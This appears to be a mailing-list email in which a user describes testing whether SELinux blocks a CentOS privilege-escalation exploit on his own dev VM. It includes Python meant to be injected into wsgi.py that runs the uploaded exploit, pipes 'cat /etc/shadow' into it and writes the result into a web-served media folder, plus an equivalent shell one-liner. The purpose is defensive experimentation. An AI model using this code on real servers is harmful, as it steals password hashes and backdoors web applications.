<div dir="ltr">Hello,<div><br></div><div>I just read about this CentOS vulnerability:</div><div><br></div><div><a href="https://www.centos.org/modules/newbb/viewtopic.php?topic_id=42827&forum=59">https://www.centos.org/modules/newbb/viewtopic.php?topic_id=42827&forum=59</a><br>
</div><div><br></div><div style>I am trying to construct a science experiment to see if SELinux properly mitigates this attack. I spun up a new VM of my dev server, and I have a website running via Apache and WSGI. I am trying to simulate a potential attack whereby someone uploads the exploit to the media directory of a Mezzanine-based app, and runs it by injecting malicious code into wsgi.py. Far fetched, I know, but it's a science experiment after all.</div>
<div style><br></div><div style>The code noted below just causes the Apache thread to hang. I don't show any SELinux AVC denials so I don't think the executable is being run. (But that might not be a valid assertion, seeing that I'm testing SELinux in the first place.)</div>
<div style><br></div><div style>Does anyone see any glaring issues here?</div><div style><br></div><div style>Cheers,</div><div style>-JK</div><div style><br></div><div style><div># Evil hack: This command line works when run as a non-root user:</div>
<div># echo "cat /etc/shadow" | /srv/website/www/website/static/media/semtex_exploit > /srv/website/www/website/static/media/passwords </div><div><br></div><div>from subprocess import Popen, PIPE</div><div><br>
</div><div>cmd = '/srv/website/www/website/static/media/semtex_exploit'</div><div><br></div><div>p = Popen(cmd, stdout=PIPE, stderr=PIPE, stdin=PIPE)</div><div>p.stdin.write("cat /etc/shadow\n")</div><div>
<br></div><div>mtext = p.stdout.read()</div><div><br></div><div>with open('/srv/website/www/website/static/media/shadow', 'a') as the_file:</div><div> the_file.write(mtext)</div></div></div>